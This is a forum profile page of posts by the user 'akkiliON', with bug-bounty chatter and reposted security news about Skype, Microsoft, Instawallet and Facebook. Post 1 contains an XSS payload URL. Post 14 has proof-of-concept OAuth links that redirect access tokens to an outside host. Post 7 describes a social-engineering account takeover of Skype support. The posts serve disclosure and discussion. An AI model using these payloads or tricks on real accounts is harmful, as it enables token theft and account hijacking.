akkiliON

Active Members
  • Posts: 1177
  • Days Won: 46

Everything posted by akkiliON

  1. Done! I have something special for you! Stop arguing :) https://www.google.com/appserve/security-bugs/new?rl="><script>alert(42)</script> // Don't panic, it runs in a sandbox!
  2. You could make a video and censor your vector, the spot where it is vulnerable and some of the page so nobody can tell where it is, and leave only the site visible! Add document.cookie, domain and an alert with a normal message :) Just saying :) Since they are curious anyway! Make them a video.
  3. Didn't you send a message here: sitesecurity@paypal.com? After that they reply telling you to go to this site, keys.ebay.com, and send them a message back if there is anything!
  4. So how the hell haven't you received any message o_O? It is valid on that subdomain! I reported one in community and they told me someone else had already found the bug :/ !
  5. OFF: It would have been simpler to ask him what GG and GJ mean
  6. Bug Bounty Program
  7. You can install the industry’s strongest and most expensive firewall. You can educate employees about basic security procedures and the importance of choosing strong passwords. You can even lock down the server room, but how do you protect a company from the threat of social engineering attacks? For any of you that are involved in security awareness efforts, you know what I am talking about. It could happen tomorrow, it could happen today or it might already have happened.

     In a recent disclosure, renowned hacker and developer DarkCoderSc (Jean-Pierre LESUEUR) explained how one can easily socially engineer the Microsoft Skype support team to get access to any Skype account. From a social engineering perspective, employees are the weak link in the chain of security measures in place. He simply used the weakness of the Skype password recovery system itself. One simply needs to request a new password from Skype support, asking them to change the password. After the initial step one needs to prove real ownership of the requested account. You must give 5 contact accounts to the support desk.

     "That’s easy because you just have to add 5 fake temporary accounts to the target account and it's done. Another option is to simply ask the target what people he knows on Skype. That option wasn't that hard because I have over 1000 contacts." he suggests the trick. Within a few seconds an attacker can become the owner of any victim's account by providing very basic information to the support team.

     "Also Microsoft’s Support Team should make a serious effort to communicate better to their customers. At the moment they do not seem to care that much about their customers."

     Social engineering is the act of manipulating a person into gaining access or sensitive data by preying on basic human psychology. Still, there is no patch for human stupidity!

     Social Engineering Skype Support team to hack any account instantly - TheHackerNews
  8. Since someone opened this topic anyway .... I also wish you a Happy Birthday and continued good health. By the way! Age: ?
  9. Off topic! Maybe you will get a "bonus"! If you find it funny you could have posted it in the fun stuff category!
  10. Microsoft has released an advance notification of 9 security bulletins that it plans to release on April 9, 2013. Microsoft said it will patch nine vulnerabilities in total, two of them rated Critical and the remaining 7 rated Important. The Critical vulnerabilities are remote code execution issues. The first vulnerability affects Microsoft Windows and Internet Explorer while the second affects Microsoft Windows. The update will fix a flaw that allows a drive-by attack, which hackers can exploit to attack machines running the software using malware-loaded websites.

     Earlier this year, Microsoft released an emergency update for Internet Explorer after all the commotion about the security holes in Java. The update aimed to patch a security vulnerability in Internet Explorer that was being used for attacks on government contractors and other organisations. The remaining 7 vulnerabilities pertain to issues affecting Microsoft Office, Microsoft Server Software and Microsoft Windows. Microsoft will host a webcast to address customer questions on the security bulletins on April 10, 2013, at 11:00 AM Pacific Time (US & Canada). TheHackerNews
  11. Note that I posted this yesterday https://rstforums.com/forum/67599-url-redirection-flaw-facebook-apps-push-oauth-vulnerability-again-action.rst
  12. This challenge is too cool // There is still something // edit: I finished. Nice challenge!
  13. The digital currency Bitcoin has suffered yet another hack. Bitcoin wallet site Instawallet has been taken offline after a security compromise and has suspended its service indefinitely. Instawallet didn't say in a notice on its website how many bitcoins were stolen after hackers fraudulently accessed the company database. "The Instawallet service is suspended indefinitely until we are able to develop an alternative architecture. Our database was fraudulently accessed, due to the very nature of Instawallet it is impossible to reopen the service as-is."

     Bitcoin is a virtual currency that uses a peer-to-peer system to confirm transactions through public key cryptography. The company also announced it will accept claims for individual Instawallets for the first 90 days, using the wallets’ URL and key to file the claim. Clients will then be refunded the currency value if the balance is less than 50 BTC.

     The breach follows a series of attacks targeting bitcoin services. In September 2012, Bitfloor suspended all operations after a hacker stole $250,000 worth of bitcoins. In May of last year, exchange site Bitcoinica was also breached, and attackers managed to grab bitcoins valued at $90,000. It may be a day or two before the effect of this theft on the currency can be determined. Bitcoin-Central is expecting to have their services back up and running within 48 hours and has promised to give 24 hours' notice before going live. Instawallet however has been permanently compromised and is closing. TheHackerNews
  14. In earlier posts, our Facebook hacker 'Nir Goldshlager' exposed two serious Facebook OAuth flaws: one, hacking a Facebook account even without the user installing an application on their account, and second, various ways of bypassing the regex protection in Facebook OAuth. This time, Nir illustrated an attack scenario: "what happens when an application is installed on the victim’s account and how an attacker can manipulate it so easily". According to the hacker, if the victim has an installed application like Skype or Dropbox, the hacker is still able to take control over their account. For this, an attacker requires only a URL redirection or cross-site scripting vulnerability on the domain of the Facebook app owner, i.e. in this scenario we are talking about the Skype Facebook app. In many bug bounty programs URL redirection is not considered a valid vulnerability for reward, e.g. the Google Bug Bounty Program.

     Nir also demonstrated that an attacker is even able to gain knowledge of which applications their victims are using. Example URL: https://www.facebook.com/ajax/browser/dialog/friends_using_app/?app_id=260273468396&__asyncDialog=2&__a=1&__req=m

     Because Facebook applications are developed by third-party developers, who actually own the app, Facebook was helpless to fix such potentially pernicious site redirection attacks. Continuing the hacking method used in the last two OAuth flaws (mentioned here), this time the attack tries to use the app redirection flaw in the “redirect_uri, next” parameter to steal the access_token of Facebook users.

     POC (Using Skype app): https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1

     POC (Using Dropbox app): https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1

     The purpose of the hacker is just to steal the victim’s access_token through the use of Facebook OAuth flaws, so that he can take full control over the victim's account remotely without knowing their password. Note: The flaw was reported to the Facebook security team by Nir Goldshlager but can't be fixed by the Facebook team itself. Because app developers are responsible for app programming mistakes, the issue is still unfixed for millions of other apps. TheHackerNews
  15. I also found an XSS in Y!M! I reported it and they told me they want to give me a T-shirt. I will post it a bit later! Aaaaand ... maybe I will make another one public soon, but it is not in Y!M!
  16. He only said that that text should stop moving